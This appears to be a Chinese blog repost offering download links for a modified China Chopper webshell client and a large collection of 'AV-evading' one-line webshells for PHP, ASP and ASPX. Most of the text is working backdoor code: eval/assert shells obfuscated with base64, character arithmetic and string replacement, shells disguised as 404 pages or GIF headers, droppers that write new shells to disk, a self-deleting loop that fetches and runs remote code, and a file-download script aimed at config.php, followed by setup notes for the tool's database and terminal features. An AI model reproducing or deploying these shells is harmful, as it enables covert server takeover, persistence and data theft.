最新中国菜刀下载,免杀菜刀一句话大全.
来源:互联网 发布:单片机下载电路图 编辑:程序博客网 时间:2024/06/10 17:19
中国菜刀下载,基于原版中国菜刀优化版20160309.
下载地址:
http://download.csdn.net/detail/settoken/9457567
http://pan.baidu.com/s/1jHoJxHW
China chopper
http://pan.baidu.com/s/1eRxEYjC
Asp
<%set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
xml="<?xml version=""1.0""?><root >cmd /c dir</root>"
xmldoc.loadxml(xml)
Set xsldoc = Server.CreateObject("MSXML2.DOMDocument")
xlst="<?xml version='1.0'?><xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""><msxsl:script language=""JScript"" implements-prefix=""zcg""> function xml(x) {var a=new ActiveXObject('wscript.shell'); var exec=a.Exec(x);return exec.StdOut.ReadAll()+exec.StdErr.ReadAll(); }</msxsl:script><xsl:template match=""/root""> <xsl:value-of select=""zcg:xml(string(.))""/></xsl:template></xsl:stylesheet>"
xsldoc.loadxml(xlst)
response.write "<pre><xmp>" & xmldoc.TransformNode(xsldoc)& "</xmp></pre>"
%>
Php
<?php
$xml='<root>assert($_POST[a]);</root>';
$xsl='<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:zcg="http://php.net/xsl">
<xsl:template match="/root">
<xsl:value-of select="zcg:function(\'assert\',string(.))"/>
</xsl:template>
</xsl:stylesheet>';
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
$proc->registerPHPFunctions();
$proc->importStyleSheet($xsldoc);
$proc->transformToXML($xmldoc);
?>
Aspx
<%@page language="C#"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
string xml=@"<?xml version=""1.0""?><root>test</root>";
string xslt=@"<?xml version='1.0'?>
<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
<msxsl:script language=""JScript"" implements-prefix=""zcg"">
<msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
</msxsl:script>
<xsl:template match=""/root"">
<xsl:value-of select=""zcg:xml()""/>
</xsl:template>
</xsl:stylesheet>";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());
%>
一句话:
PHP: <?php @eval($_POST['settoken']);?>
ASP: <%eval request("settoken")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["settoken"],"unsafe");%>
******************************************
<?php eval(base64_decode($_POST[index]))?>
<O>index=ZXZhbCgkX1BPU1RbMF0pOw==</O>
0
<?php fputs(fopen('./settoken.php','w+'),'<?php eval(base64_decode($_POST[index]))?>');?>
<?php
$sme="JrGluZm89rJF9QT1NUW2r9w";
$wd="ZW5pbmZvXTrtlY2hvIGVr";
$ova="2YWwoJGlrurZm8pO2Vr";
$xul = str_replace("ej","","stejrej_ejrejeejplaejceje");
$axc="jraG8grIjQwNCBOb3QgRm91bmQiOw==";
$ay = $xul("z", "", "zbzazszez64z_zdzecozde");
$ao = $xul("h","","hchrehahtheh_hfuhnhchthihohn");
$tik = $ao('', $ay($xul("r", "", $sme.$wd.$ova.$axc))); $tik();
$=$=openinfo
?>
<?php
$webscan=range(1,200);$webscan360=chr($webscan[96]).chr($webscan[114]).chr($webscan[114]).chr($webscan[100]).chr($webscan[113]).chr($webscan[115]);
$webscan360(${chr($webscan[94]).chr($webscan[79]).chr($webscan[78]).chr($webscan[82]).chr($webscan[83])}[chr($webscan[51])]);
$=$=4
?>
<?php $info=$_POST[info];echo eval($info);echo "404 Not Found"; ?>
<?php @preg_replace("//e",$_POST["Access"],"Access Denied"); ?>
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[index];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
<?php preg_replace("/^/e",base64_decode($_REQUEST[page]),0); ?>
settoken.php?page=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==
<?php fputs(fopen(base64_decode("bG9ncy5waHA="), "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVodWEnXSk7Pz4="));?>
logs.php
this_is_yijuhua
<?php
$str = 'aerst';
$funct = $str{0}.$str{3}.$str{3}.$str{1}.$str{2}.$str{4};
@$func($_POST['funC']);
?>
<script language="php">@eval($_POST['p'.'h'.'p'])</script>
<?php
$func=pack("c6",97,115,115,101,114,116);
$_POST['c']=base64_decode( $_POST['c']) ;
$func($_POST['404']);
?>
<?php
echo "404 Not Found.";
$__Chr__ = $_POST['echo_Chr_Get']; if ($__Chr__!="") { $echo_Chr_Get__=base64_decode($_POST['z0']); @eval("\$echo = $echo_Chr_Get__;"); } ?>
<?php
echo "404 Not Found.";
$Temp=range(1,200);$Log=chr($Temp[96]).chr($Temp[114]).chr($Temp[114]).chr($Temp[100]).chr($Temp[113]).chr($Temp[115]);
$Log(${chr($Temp[94]).chr($Temp[79]).chr($Temp[78]).chr($Temp[82]).chr($Temp[83])}[chr($Temp[114])]);
$=$=s
?>
<?php
$var = "var";
if (isset($_GET["arg"]))
{
$arg = $_GET["arg"];
eval("\$var = $arg;");
echo "\$var =".$var;
}
?>
?arg=phpinfo()
?arg=fputs(fopen('page.php','w+'),'<?php%20eval($_POST[page])?>')
<?php
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".$_GET['path']);
readfile($_GET['path']);
?>
?path=config.php
<?php include 'log.log';?>
<!--#include file="log.log"-->
file_put_contents('log.php','<?php eval($_POST[page])?>'); eval.txt
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://localhost:8080/eval.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>
******************************************
<%eval e%>
<%e=request(page)%>
<!--#include file="settoken.asp"-->
<%MYTEST=REquEst("page"):EvaL(MYTEST)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>
<%Y=request("x")%> <%execute(Y)%>
<!-- Page++ -->
<%
dim x1,x2
x1 = request("page")
x2 = x1
eval x2
%>
<!-- Page++ -->
<%configconfigconfig=REqUEsT(chr(97))%>
<%eVAL configconfigconfig%>
gif89a;gifok<%Page=request("index")%><%eval Page%>gif89a;
数据库:
A) 数据库方面:
-----------------------------------------------------------------------------
PHP脚本:
<T>MYSQL</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>localhost<H> 主机地址可为机器名或IP地址,如localhost
<U>root</U> 连接数据库的用户名,如root
<P>settoken</P> 连接数据库的密码,如12345
<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1
ASP和ASP.NET脚本:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=settoken;
同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件
Customize 脚本:
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=settoken
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=settoken
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/password@127.0.0.1:1521/test
</X>
B) 其它方面:
-----------------------------------------------------------------------------
添加额外附加提交的数据,如ASP的新服务端是这样的:
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SC"))
o.run "ff",Server,Response,Request,Application,Session,Error
%>
那么,菜刀在配置处填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
<POST>https://zhongguocaidao/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
默认终端程序路径设置示例:
<SHELL>/bin/sh</SHELL>
虚拟终端默认命令设置示例:
<CMD>whoami</CMD>
文件管理默认打开的目录设置示例:
<CD>c:\windows\temp\</CD>
3) HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换.
1 0
- 最新中国菜刀下载,免杀菜刀一句话大全.
- PHP一句话木马,中国菜刀
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- 2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)
- [基本实验] 中国菜刀与一句话木马
- 一句话与中国菜刀的用法
- 一句话木马+菜刀
- 中国菜刀 及使用方法
- 中国菜刀使用帮助
- 中国菜刀的使用
- 菜刀 下载链接
- 介绍 RWSH – Ray’s Web SHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- 中国菜刀远程webshell管理工具
- 技术剖析中国菜刀原理
- 技术剖析中国菜刀原理
- kali中的中国菜刀weevely
- [中国菜刀]用法全解
- 菜刀杀狗
- 锐浪报表设置指定量空白行的方法
- 违例(异常)准则
- 获取当前位置(Core Location)
- 启动程序,关闭dos
- ImageView的scaletype属性
- 最新中国菜刀下载,免杀菜刀一句话大全.
- 上传组件uploadify封装
- Android 基础:Materia Design 定义视图阴影elevation和创建卡片CardView
- 设置权限出现红叉叉问题
- 笔记本安装openwrt x86
- 开放平台中oauth认证中请求参数签名的算法
- LeetCode || Add Two Numbers
- LeetCode(35):Palindrome Number
- 淘宝广告区点击切换图片、自动切换